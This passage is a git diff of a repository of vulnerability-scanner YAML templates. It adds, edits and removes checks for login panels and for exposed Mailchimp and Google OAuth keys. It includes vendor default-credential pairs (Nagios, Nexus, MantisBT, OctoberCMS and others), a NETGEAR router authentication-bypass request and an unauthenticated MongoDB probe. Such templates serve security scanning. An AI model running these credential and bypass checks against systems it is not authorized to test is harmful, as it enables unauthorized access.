'{{BaseURL}}/lucee/admin/server.cfm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Login - Lucee Web Administrator' - - 'Login - Lucee Server Administrator' - - type: status - status: - - 200 diff --git a/poc/auth/lutron-iot-default-login-8675.yaml b/poc/auth/lutron-iot-default-login-8675.yaml new file mode 100644 index 0000000000..aa05f20cc8 --- /dev/null +++ b/poc/auth/lutron-iot-default-login-8675.yaml @@ -0,0 +1,27 @@ +id: lutron-iot-default-login +info: + name: Lutron IOT Device Default Login + author: geeknik + severity: high + reference: + - https://www.lutron.com + tags: iot,default-login,lutron,panel +requests: + - method: GET + path: + - "{{BaseURL}}/login?login=lutron&password=lutron" + matchers-condition: and + matchers: + - type: word + words: + - "LUTRON" + - ">DeviceIP" + - ">Get Database Info as XML" + condition: and + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/poc/auth/lutron-iot-default-login-8676.yaml b/poc/auth/lutron-iot-default-login-8676.yaml index 2ec014fb93..9f80864342 100644 --- a/poc/auth/lutron-iot-default-login-8676.yaml +++ b/poc/auth/lutron-iot-default-login-8676.yaml @@ -1,13 +1,17 @@ id: lutron-iot-default-login + info: name: Lutron IOT Device Default Login reference: https://www.lutron.com author: geeknik severity: high + tags: iot,default-login,lutron,panel + requests: - method: GET path: - "{{BaseURL}}/login?login=lutron&password=lutron" + matchers-condition: and matchers: - type: word @@ -16,10 +20,12 @@ requests: - ">DeviceIP" - ">Get Database Info as XML" condition: and + - type: word part: header words: - "text/html" + - type: status status: - 200 diff --git a/poc/auth/lutron-iot-default-login-8678.yaml b/poc/auth/lutron-iot-default-login-8678.yaml deleted file mode 100644 index 9f80864342..0000000000 --- a/poc/auth/lutron-iot-default-login-8678.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: lutron-iot-default-login - -info: - name: Lutron IOT Device Default Login - reference: https://www.lutron.com - author: geeknik - severity: high - tags: iot,default-login,lutron,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/login?login=lutron&password=lutron" - - matchers-condition: and - matchers: - - type: word - words: - - "LUTRON" - - ">DeviceIP" - - ">Get Database Info as XML" - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 diff --git a/poc/auth/lutron-iot-default-login.yaml b/poc/auth/lutron-iot-default-login.yaml index aa05f20cc8..71fd122838 100644 --- a/poc/auth/lutron-iot-default-login.yaml +++ b/poc/auth/lutron-iot-default-login.yaml @@ -1,15 +1,16 @@ id: lutron-iot-default-login + info: name: Lutron IOT Device Default Login + reference: https://www.lutron.com author: geeknik severity: high - reference: - - https://www.lutron.com - tags: iot,default-login,lutron,panel + requests: - method: GET path: - "{{BaseURL}}/login?login=lutron&password=lutron" + matchers-condition: and matchers: - type: word diff --git a/poc/auth/mailchimp-api-key-8722.yaml b/poc/auth/mailchimp-api-key-8722.yaml index fb0d8ec4c2..14819b8241 100644 --- a/poc/auth/mailchimp-api-key-8722.yaml +++ b/poc/auth/mailchimp-api-key-8722.yaml @@ -1,22 +1,20 @@ id: mailchimp-access-key-value - info: name: Mailchimp API Value author: puzzlepeaches - severity: info - metadata: - max-request: 1 - tags: exposure,token,mailchimp - -http: + severity: medium +requests: - method: GET path: - - "{{BaseURL}}" - + - "{{BaseURL}}/" + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "[0-9a-f]{32}-us[0-9]{1,2}" extractors: - type: regex part: body regex: - "[0-9a-f]{32}-us[0-9]{1,2}" - -# digest: 4a0a0047304502207e0ab7518b414240980df385f972649a53d23d4cbdd9541a4b521a4785fd5f34022100d07a1f2d85bf26f3a817e8ccca7af3b238d06d93be9c3da1020682d0170d7fc4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/mailchimp-api-key-8726.yaml b/poc/auth/mailchimp-api-key-8726.yaml deleted file mode 100644 index 14819b8241..0000000000 --- a/poc/auth/mailchimp-api-key-8726.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: mailchimp-access-key-value -info: - name: Mailchimp API Value - author: puzzlepeaches - severity: medium -requests: - - method: GET - path: - - "{{BaseURL}}/" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "[0-9a-f]{32}-us[0-9]{1,2}" - extractors: - - type: regex - part: body - regex: - - "[0-9a-f]{32}-us[0-9]{1,2}" diff --git a/poc/auth/mantisbt-default-credential-8778.yaml b/poc/auth/mantisbt-default-credential-8778.yaml index 329e2e16cb..4ffeb88644 100644 --- a/poc/auth/mantisbt-default-credential-8778.yaml +++ b/poc/auth/mantisbt-default-credential-8778.yaml @@ -2,52 +2,45 @@ id: mantisbt-default-credential info: name: MantisBT Default Admin Login - author: YashVardhanTripathi + author: For3stCo1d severity: high - description: A MantisBT default admin login dsicovery template. - -http: - - method: GET - path: - - "{{BaseURL}}/mantis/login_page.php" - - redirects: true - - extractors: - - type: regex - name: somesome - group: 1 - part: header - regex: - - "PHPSESSID=([a-zA-Z0-9]+);" + description: A MantisBT default admin login was discovered. + reference: + - https://mantisbt.org/ + metadata: + shodan-query: title:"MantisBT" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: mantisbt,default-login +requests: - raw: - | - POST /mantis/login_password_page.php HTTP/1.1 + POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Cookie: MANTIS_secure_session=1; PHPSESSID={{somesome}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate, br - Connection: close - Upgrade-Insecure-Requests: 1 - return=index.php&username={{pewpew}}&password={{password}}&secure_session=on + return=index.php&username={{user}}&password={{pass}} + attack: pitchfork payloads: - pewpew: + user: - administrator - password: + pass: - root - attack: pitchfork + matchers-condition: and matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'mantis_secure_session') + - contains(tolower(all_headers), 'mantis_string_cookie') + condition: and + - type: status status: - 302 - - type: regex - part: header - regex: - - "Location: .*?/login_cookie_test.php\\?return=account_page.php" + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/meshcentral-login-8801.yaml b/poc/auth/meshcentral-login-8801.yaml deleted file mode 100644 index 7f06f95f8e..0000000000 --- a/poc/auth/meshcentral-login-8801.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: meshcentral-login -info: - name: MeshCentral - Login - author: dhiyaneshDk - severity: info - metadata: - shodan-query: 'http.title:"MeshCentral - Login"' - tags: panel,meshcentral -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "MeshCentral - Login" - - type: status - status: - - 200 diff --git a/poc/auth/meshcentral-login-8803.yaml b/poc/auth/meshcentral-login-8803.yaml new file mode 100644 index 0000000000..32556ae3e5 --- /dev/null +++ b/poc/auth/meshcentral-login-8803.yaml @@ -0,0 +1,21 @@ +id: meshcentral-login +info: + name: MeshCentral - Login + author: dhiyaneshDk + severity: info + metadata: + shodan-query: http.title:"MeshCentral - Login" + tags: panel,meshcentral +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "MeshCentral - Login" + - type: status + status: + - 200 diff --git a/poc/auth/mongodb-unauth-8925.yaml b/poc/auth/mongodb-unauth-8925.yaml deleted file mode 100644 index 904fcb4355..0000000000 --- a/poc/auth/mongodb-unauth-8925.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: mongodb-unauth - -info: - name: Unauth MongoDB Disclosure - author: pdteam - severity: high - reference: https://github.com/orleven/Tentacle - tags: network,mongodb,unauth - -network: - - inputs: - - data: 480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000 - type: hex - - host: - - "{{Hostname}}" - - "{{Host}}:27017" - read-size: 2048 - matchers: - - type: word - words: - - "totalLinesWritten" diff --git a/poc/auth/mongodb-unauth-8928.yaml b/poc/auth/mongodb-unauth-8928.yaml index 96c39c9b0a..95c8e16782 100644 --- a/poc/auth/mongodb-unauth-8928.yaml +++ b/poc/auth/mongodb-unauth-8928.yaml @@ -1,26 +1,19 @@ id: mongodb-unauth info: - name: MongoDB - Unauthenticated Access + name: Unauth MongoDB Disclosure author: pdteam severity: high - description: MongoDB was able to be accessed with no password. Note that MongoDB does not require a password by default. - reference: - - https://github.com/orleven/Tentacle - - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb - - https://www.mongodb.com/features/mongodb-authentication - remediation: Enable Authentication in MongoDB - tags: network,mongodb,unauth + reference: https://github.com/orleven/Tentacle + tags: network,mongodb network: - inputs: - data: 480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000 type: hex host: - "{{Hostname}}" - - "{{Host}}:27017" + - "{{Hostname}}:27017" read-size: 2048 matchers: - type: word words: - "totalLinesWritten" - -# Enhanced by mp on 2022/07/20 diff --git a/poc/auth/mysql-native-password-8981.yaml b/poc/auth/mysql-native-password-8981.yaml index 2f6a91ddb9..86607cd0ec 100644 --- a/poc/auth/mysql-native-password-8981.yaml +++ b/poc/auth/mysql-native-password-8981.yaml @@ -1,17 +1,14 @@ id: mysql-native-password - info: name: MySQL DB with enabled native password author: iamthefrogy severity: info - description: MySQL instance with enabled native password support is prone to password brute-force attacks. tags: network,mysql,bruteforce,db - + description: MySQL instance with enabled native password support is prone to password brute-force attacks. network: - host: - "{{Hostname}}" - "{{Host}}:3306" - matchers: - type: word words: diff --git a/poc/auth/mysql-native-password.yaml b/poc/auth/mysql-native-password.yaml index 86607cd0ec..ba4b0a61fb 100644 --- a/poc/auth/mysql-native-password.yaml +++ b/poc/auth/mysql-native-password.yaml @@ -1,15 +1,26 @@ id: mysql-native-password + info: - name: MySQL DB with enabled native password + name: MySQL - Password Vulnerability author: iamthefrogy severity: info - tags: network,mysql,bruteforce,db - description: MySQL instance with enabled native password support is prone to password brute-force attacks. -network: + description: MySQL database queries with enabled native password support are susceptible to password brute-force attacks. + reference: + - https://github.com/Tinram/MySQL-Brute + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: network,mysql,bruteforce,db,misconfig + +tcp: - host: - "{{Hostname}}" - - "{{Host}}:3306" + port: 3306 + matchers: - type: word words: - "mysql_native_password" +# digest: 490a00463044022044732766bfbc5d532a502fe7223dd1d30be97a75773e7381615d68dab21a5f7e022004498362c35d63c1b8712520d0754e9c825be442a44c5cd9e3bd1c605f00e387:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/nagios-default-login-8990.yaml b/poc/auth/nagios-default-login-8990.yaml new file mode 100644 index 0000000000..9b4cbecca4 --- /dev/null +++ b/poc/auth/nagios-default-login-8990.yaml @@ -0,0 +1,44 @@ +id: nagios-default-login + +info: + name: Nagios Default Login + author: iamthefrogy + description: Nagios default admin credentials were discovered. + severity: high + tags: nagios,default-login + reference: https://www.nagios.org + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 + +requests: + - raw: + - | + GET /nagios/side.php HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - nagiosadmin + - root + password: + - nagiosadmin + - nagiosxi + attack: pitchfork + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Current Status' + - 'Reports' + condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/nagios-default-login-8994.yaml b/poc/auth/nagios-default-login-8994.yaml deleted file mode 100644 index e1982ba865..0000000000 --- a/poc/auth/nagios-default-login-8994.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: nagios-default-login -info: - name: Nagios Default Login - author: d3sca - severity: high - tags: nagios,default-login - reference: https://www.nagios.org -requests: - - raw: - - | - GET /nagios/side.php HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - payloads: - username: - - nagiosadmin - - root - password: - - nagiosadmin - - nagiosxi - attack: pitchfork - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'Current Status' - - 'Reports' - condition: and diff --git a/poc/auth/netgear-router-auth-bypass-9025.yaml b/poc/auth/netgear-router-auth-bypass-9025.yaml deleted file mode 100644 index 930b6cb68f..0000000000 --- a/poc/auth/netgear-router-auth-bypass-9025.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: netgear-router-auth-bypass -info: - name: NETGEAR DGN2200v1 Router Authentication Bypass - author: gy741 - severity: high - description: NETGEAR DGN2200v1 Router does not require authentication if a page has “.jpg”, “.gif”, or “ess_” substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., “?.gif”). - reference: - - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 - tags: netgear,auth-bypass,router -requests: - - raw: - - | - GET /WAN_wan.htm?.gif HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - | - GET /WAN_wan.htm?.gif HTTP/1.1 - Host: {{Hostname}} - Accept: */* - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "WAN Setup" diff --git a/poc/auth/netgear-router-auth-bypass.yaml b/poc/auth/netgear-router-auth-bypass.yaml new file mode 100644 index 0000000000..515963c861 --- /dev/null +++ b/poc/auth/netgear-router-auth-bypass.yaml @@ -0,0 +1,28 @@ +id: netgear-router-auth-bypass +info: + name: NETGEAR DGN2200v1 Router Authentication Bypass + author: gy741 + severity: high + description: NETGEAR DGN2200v1 Router does not require authentication if a page has ".jpg", ".gif", or "ess_" substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., "?.gif"). + reference: + - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ + - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 + tags: netgear,auth-bypass,router +requests: + - raw: + - | + GET /WAN_wan.htm?.gif HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + GET /WAN_wan.htm?.gif HTTP/1.1 + Host: {{Hostname}} + Accept: */* + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "WAN Setup" diff --git a/poc/auth/netscaler-aaa-login.yaml b/poc/auth/netscaler-aaa-login.yaml index 441256f6a7..ea4d37bab9 100644 --- a/poc/auth/netscaler-aaa-login.yaml +++ b/poc/auth/netscaler-aaa-login.yaml @@ -1,16 +1,29 @@ id: netscaler-aaa-login + info: - name: NetScaler AAA Login Panel + name: NetScaler AAA Login Panel - Detect author: dhiyaneshDk severity: info - reference: https://www.exploit-db.com/ghdb/6898 - tags: panel,netscaler,login -requests: + description: NetScaler AAA login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6898 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: panel,netscaler,login,edb + +http: - method: GET path: - '{{BaseURL}}/logon/LogonPoint/tmindex.html' + matchers: - type: word words: - "NetScaler AAA" condition: and + +# digest: 490a0046304402205bfa8177ee68e9094c9857093cf4887e370c5aa126c6cda8f1f9fccfdd5b2d220220597ae2c1e087305ce4f0f426c4e7b1d2ba08718d80571938424bdafb4cb3dd6f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/netsus-default-login-9060.yaml b/poc/auth/netsus-default-login-9060.yaml deleted file mode 100644 index d2d6a86e19..0000000000 --- a/poc/auth/netsus-default-login-9060.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: netsus-default-login - -info: - name: NetSUS Server Default Login - author: princechaddha - severity: high - description: NetSUS Server default admin credentials were discovered. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 1 - shodan-query: http.title:"NetSUS Server Login" - tags: netsus,default-login - -http: - - raw: - - | - POST /webadmin/index.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - loginwith=suslogin&username={{username}}&password={{password}}&submit= - - attack: pitchfork - payloads: - username: - - webadmin - password: - - webadmin - - matchers-condition: and - matchers: - - type: word - part: header - words: - - 'Location: dashboard.php' - - 'PHPSESSID=' - condition: and - - - type: status - status: - - 302 - -# digest: 4b0a00483046022100f81ef0749fcb57b49a9eee5f0d9ef75806c3f56c5940782b6063ac5c689bab70022100f300142aa6fdcb0f7e9562484cd14eb4ebb8d0efb0597c63a69b6407f6eed8b2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/netsus-default-login.yaml b/poc/auth/netsus-default-login.yaml new file mode 100644 index 0000000000..adee76136b --- /dev/null +++ b/poc/auth/netsus-default-login.yaml @@ -0,0 +1,33 @@ +id: netsus-default-login +info: + name: NetSUS Server Default Login + author: princechaddha + severity: high + metadata: + shodan-query: 'http.title:"NetSUS Server Login"' + tags: netsus,default-login +requests: + - raw: + - | + POST /webadmin/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + loginwith=suslogin&username={{username}}&password={{password}}&submit= + attack: pitchfork + payloads: + username: + - webadmin + password: + - webadmin + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Location: dashboard.php' + - 'PHPSESSID=' + condition: and + - type: status + status: + - 302 diff --git a/poc/auth/netsus-server-login-9061.yaml b/poc/auth/netsus-server-login-9061.yaml new file mode 100644 index 0000000000..8ae8adef0c --- /dev/null +++ b/poc/auth/netsus-server-login-9061.yaml @@ -0,0 +1,20 @@ +id: netsus-server-login +info: + name: NetSUS Server Login Panel + author: dhiyaneshDK + severity: info + metadata: + shodan-query: 'http.title:"NetSUS Server Login"' + tags: panel,netsus,login +requests: + - method: GET + path: + - '{{BaseURL}}/webadmin/' + matchers-condition: and + matchers: + - type: word + words: + - 'NetSUS Server Login' + - type: status + status: + - 200 diff --git a/poc/auth/netsus-server-login-9062.yaml b/poc/auth/netsus-server-login-9062.yaml deleted file mode 100644 index 510cd9bae5..0000000000 --- a/poc/auth/netsus-server-login-9062.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: netsus-server-login -info: - name: NetSUS Server Login Panel - author: dhiyaneshDK - severity: info - metadata: - shodan-query: http.title:"NetSUS Server Login" - tags: panel,netsus,login -requests: - - method: GET - path: - - '{{BaseURL}}/webadmin/' - matchers-condition: and - matchers: - - type: word - words: - - 'NetSUS Server Login' - - type: status - status: - - 200 diff --git a/poc/auth/nexus-default-login-9088.yaml b/poc/auth/nexus-default-login-9088.yaml index 3560137b42..9b769c93c0 100644 --- a/poc/auth/nexus-default-login-9088.yaml +++ b/poc/auth/nexus-default-login-9088.yaml @@ -1,5 +1,4 @@ id: nexus-default-login - info: name: Nexus Default Login author: pikpikcu @@ -9,11 +8,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - max-request: 1 tags: nexus,default-login - -http: +requests: - raw: - | POST /service/rapture/session HTTP/1.1 @@ -22,20 +18,17 @@ http: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username={{base64(username)}}&password={{base64(password)}} - payloads: username: - admin password: - admin123 attack: pitchfork - matchers-condition: and matchers: - type: status status: - 204 - - type: word words: - "Server: Nexus" @@ -43,4 +36,4 @@ http: part: header condition: and -# digest: 4b0a00483046022100c45ecf382aa007cfca38e5e787d1e06605e4f93544ee237e29ff85360421f772022100e22e8814df0f932a2b481ebca3ee6786b458639f31c7a37883b5fbc9d7e774af:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/nexus-default-login-9089.yaml b/poc/auth/nexus-default-login-9089.yaml index 52f9a00602..3560137b42 100644 --- a/poc/auth/nexus-default-login-9089.yaml +++ b/poc/auth/nexus-default-login-9089.yaml @@ -1,10 +1,19 @@ id: nexus-default-login + info: name: Nexus Default Login author: pikpikcu severity: high + description: Nexus default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 1 tags: nexus,default-login -requests: + +http: - raw: - | POST /service/rapture/session HTTP/1.1 @@ -13,20 +22,25 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username={{base64(username)}}&password={{base64(password)}} + payloads: username: - admin password: - admin123 attack: pitchfork + matchers-condition: and matchers: - type: status status: - 204 + - type: word words: - "Server: Nexus" - "NXSESSIONID" part: header condition: and + +# digest: 4b0a00483046022100c45ecf382aa007cfca38e5e787d1e06605e4f93544ee237e29ff85360421f772022100e22e8814df0f932a2b481ebca3ee6786b458639f31c7a37883b5fbc9d7e774af:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/nps-default-login-9145.yaml b/poc/auth/nps-default-login-9145.yaml deleted file mode 100644 index ec2e9c00fa..0000000000 --- a/poc/auth/nps-default-login-9145.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: nps-default-login - -info: - name: NPS Default Login - author: pikpikcu - severity: high - description: NPS default admin credentials were discovered. - reference: - - https://docs.microfocus.com/NNMi/10.30/Content/Administer/Hardening/confCC2b_pwd.htm - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 1 - tags: nps,default-login - -http: - - raw: - - | - POST /login/verify HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: {{Hostname}}/login/index - - username={{username}}&password={{password}} - - payloads: - username: - - admin - password: - - 123 - attack: pitchfork - - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - condition: and - - - type: word - words: - - '"msg": "login success"' - - '"status": 1' - part: body - condition: and - - - type: status - status: - - 200 - -# digest: 490a004630440220606c381c7362f49fbe0d2cd4cda89a9e4a210f0b5fd4b5d5fa2f3046f159dcce022001e59e9ab3ccf71662fdd228b0cb33a3afa348145c16b4f3a2336fe9e26c3fdb:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/nuuno-network-login-9164.yaml b/poc/auth/nuuno-network-login-9164.yaml new file mode 100644 index 0000000000..5cebebd091 --- /dev/null +++ b/poc/auth/nuuno-network-login-9164.yaml @@ -0,0 +1,20 @@ +id: nuuno-network-login +info: + name: NUUO Network Video Recorder Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6840 + tags: iot,panel,nuuo +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: word + words: + - 'NUUO Network Video Recorder Login' + part: body + - type: status + status: + - 200 diff --git a/poc/auth/nuuno-network-login-9162.yaml b/poc/auth/nuuno-network-login.yaml similarity index 100% rename from poc/auth/nuuno-network-login-9162.yaml rename to poc/auth/nuuno-network-login.yaml diff --git a/poc/auth/oauth-access-key-9186.yaml b/poc/auth/oauth-access-key-9186.yaml new file mode 100644 index 0000000000..2d8fe9b31a --- /dev/null +++ b/poc/auth/oauth-access-key-9186.yaml @@ -0,0 +1,22 @@ +id: google-oauth-access-key + +info: + name: Google OAuth Access Key Disclosure + author: Ice3man + severity: info + metadata: + max-request: 1 + tags: exposure,token,google + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - 'ya29\.[0-9A-Za-z\-_]+' + +# digest: 4a0a0047304502204d03880d0ac100fc1b228742a40f773ee0eb8f075ce931afd868dafc63f76969022100a6b6074606cbfa0b79f133853b3fd5e4358a4675572cf02117b1a85dd99f2c8d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/oauth2-detect-9181.yaml b/poc/auth/oauth2-detect-9181.yaml deleted file mode 100644 index ba774a7a3c..0000000000 --- a/poc/auth/oauth2-detect-9181.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: oauth2-detect - -info: - name: OAuth 2.0 Authorization Server Detection Template - author: righettod - severity: info - description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint - metadata: - max-request: 1 - tags: tech,oauth - -http: - - method: POST - path: - - "{{BaseURL}}/oauth/token" - - body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" - - matchers-condition: and - matchers: - - type: status - status: - - 401 - - 400 - condition: or - - - type: word - part: body - words: - - 'error":"invalid_client"' - -# digest: 4a0a004730450221008920ab1a64cea625f9fa75cc16e79ea29a580cb37f3022bf6321140996d686b9022043339df3882017519713f41f22be4855e384f6505b79983592ada49c83ab4ea1:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/oauth2-detect-9182.yaml b/poc/auth/oauth2-detect-9182.yaml index fd9066a622..6d692b274c 100644 --- a/poc/auth/oauth2-detect-9182.yaml +++ b/poc/auth/oauth2-detect-9182.yaml @@ -1,28 +1,23 @@ -id: oauth2-detect - -info: - name: OAuth 2.0 Authorization Server Detection Template - author: righettod - severity: info - description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint - tags: tech,oauth - -requests: - - method: POST - path: - - "{{BaseURL}}/oauth/token" - - body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" - - matchers-condition: and - matchers: - - type: status - status: - - 401 - - 400 - condition: or - - - type: word - part: body - words: - - 'error":"invalid_client"' \ No newline at end of file +id: oauth2-detect +info: + name: OAuth 2.0 Authorization Server Detection Template + author: righettod + severity: info + description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint + tags: tech,oauth +requests: + - method: POST + path: + - "{{BaseURL}}/oauth/token" + body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" + matchers-condition: and + matchers: + - type: status + status: + - 401 + - 400 + condition: or + - type: word + part: body + words: + - 'error":"invalid_client"' diff --git a/poc/auth/octobercms-default-login-9192.yaml b/poc/auth/octobercms-default-login-9192.yaml deleted file mode 100644 index 480d0eb092..0000000000 --- a/poc/auth/octobercms-default-login-9192.yaml +++ /dev/null @@ -1,65 +0,0 @@ -id: octobercms-default-login - -info: - name: OctoberCMS - Default Admin Discovery - author: princechaddha - severity: high - description: OctoberCMS default admin credentials were discovered. - reference: - - https://github.com/octobercms/october - - https://octobercms.com/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - verified: true - max-request: 4 - shodan-query: http.component:"October CMS" - tags: octobercms,default-login,oss - -http: - - raw: - - | - GET /backend/backend/auth/signin HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - | - POST /backend/backend/auth/signin HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - - _token={{token}}&postback=1&login={{username}}&password={{password}} - - attack: clusterbomb - payloads: - username: - - admin - password: - - admin - - "" - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "october_session=" - - "admin_auth=" - condition: and - - - type: status - status: - - 302 - - extractors: - - type: regex - part: body - name: token - internal: true - group: 1 - regex: - - 'meta name="csrf\-token" content="([A-Za-z0-9]+)">' - -# digest: 4b0a004830460221008c9a98bee55491e7fe022bdcc030f081bf74c377b2de0061057ad20cadcb33a2022100e8ea2fb0bdee7e31aa27be618dcf8e91cfd91ae54928b37de4c70b77c43ffa89:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/octobercms-default-login.yaml b/poc/auth/octobercms-default-login.yaml new file mode 100644 index 0000000000..a6822af271 --- /dev/null +++ b/poc/auth/octobercms-default-login.yaml @@ -0,0 +1,59 @@ +id: octobercms-default-login +info: + name: OctoberCMS - Default Admin Discovery + author: princechaddha + severity: high + description: OctoberCMS default admin credentials were discovered. + reference: + - https://github.com/octobercms/october + - https://octobercms.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + verified: true + shodan-query: http.component:"October CMS" + tags: octobercms,default-login,oss +requests: + - raw: + - | + GET /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + - | + POST /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + _token={{token}}&postback=1&login={{username}}&password={{password}} + cookie-reuse: true + attack: clusterbomb + payloads: + username: + - admin + password: + - admin + - "" + matchers-condition: and + matchers: + - type: word + part: header + words: + - "october_session=" + - "admin_auth=" + condition: and + - type: status + status: + - 302 + extractors: + - type: regex + part: body + name: token + internal: true + group: 1 + regex: + - 'meta name="csrf\-token" content="([A-Za-z0-9]+)">' + +# Enhanced by mp on 